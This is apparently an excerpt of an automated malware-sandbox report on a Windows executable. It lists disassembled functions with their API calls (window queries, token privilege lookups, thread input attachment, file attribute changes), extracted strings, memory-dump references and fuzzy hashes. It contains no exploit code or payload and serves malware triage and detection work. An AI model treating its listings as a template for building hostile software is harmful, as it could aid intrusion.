                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CopyVariant$ErrorLast
                                                                                                                • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 2286883814-4206948668
                                                                                                                • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                Function 00460473 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 255COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                                                                • String ID: ThumbnailClass
                                                                                                                • API String ID: 3725905772-1241985126
                                                                                                                • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                Function 00436B3A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 2179348866-1459072770
                                                                                                                • Opcode ID: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
                                                                                                                • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                • Opcode Fuzzy Hash: 8f115a8dcca366765dccafad874a9911a33c709b0333e454bef2361e27f7839d
                                                                                                                • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                Function 0045E41B Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 150COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                • API String ID: 2948472770-2894483878
                                                                                                                • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                Function 004393E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                Strings
                                                                                                                • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread
                                                                                                                • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                • API String ID: 2833215880-805462909
                                                                                                                • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                • GetParent.USER32 ref: 004692A4
                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                • GetParent.USER32 ref: 004692C7
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1383977212-1403004172
                                                                                                                • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                • GetParent.USER32 ref: 0046949E
                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                • GetParent.USER32 ref: 004694C1
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1383977212-1403004172
                                                                                                                • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                                • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                                Function 00417BA8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedIncrement.KERNEL32(00411739), ref: 00417BBA
                                                                                                                • InterlockedIncrement.KERNEL32(681574C0), ref: 00417BC7
                                                                                                                • InterlockedIncrement.KERNEL32(1015FF50), ref: 00417BD4
                                                                                                                • InterlockedIncrement.KERNEL32(CorExitProcess), ref: 00417BE1
                                                                                                                • InterlockedIncrement.KERNEL32(FF0574C0), ref: 00417BEE
                                                                                                                • InterlockedIncrement.KERNEL32(FF0574C0), ref: 00417C0A
                                                                                                                • InterlockedIncrement.KERNEL32(0048215C), ref: 00417C1A
                                                                                                                • InterlockedIncrement.KERNEL32(59FFFF4B), ref: 00417C30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IncrementInterlocked
                                                                                                                • String ID: CorExitProcess
                                                                                                                • API String ID: 3508698243-1124507085
                                                                                                                • Opcode ID: d1b0377c503bbdefda5610f0537bfa72825e28dfa37e5ae55eeee1a7a8820d3e
                                                                                                                • Instruction ID: fb61f0e31799d0698f30908f9b652ac69b024978f93be2849cd97143da64a8c5
                                                                                                                • Opcode Fuzzy Hash: d1b0377c503bbdefda5610f0537bfa72825e28dfa37e5ae55eeee1a7a8820d3e
                                                                                                                • Instruction Fuzzy Hash: 11111E71B04315ABDB249B69CC84F97BBACAF40784F044427A508D7241DB78F980CBE4
                                                                                                                Function 004480F2 Relevance: 15.2, APIs: 10, Instructions: 184windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 312131281-0
                                                                                                                • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                                                • SendMessageW.USER32(75FA05F0,00001001,00000000,00000000), ref: 00448E73
                                                                                                                • SendMessageW.USER32(75FA05F0,00001026,00000000,00000000), ref: 00448E7E
                                                                                                                  • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 3771399671-0
                                                                                                                • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                                                • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                                                Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                • String ID:
                                                                                                                • API String ID: 2156557900-0
                                                                                                                • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                                • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                                                Function 00474335 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 308COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 0-2761332787
                                                                                                                • Opcode ID: a328fc3f0c2738e7ee23a6f39de9db46e7d7486e18f94bdfd929d974c39bc96d
                                                                                                                • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                                                                • Opcode Fuzzy Hash: a328fc3f0c2738e7ee23a6f39de9db46e7d7486e18f94bdfd929d974c39bc96d
                                                                                                                • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                                                                Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                • API String ID: 0-1603158881
                                                                                                                • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                Function 0045CBCC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 202COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
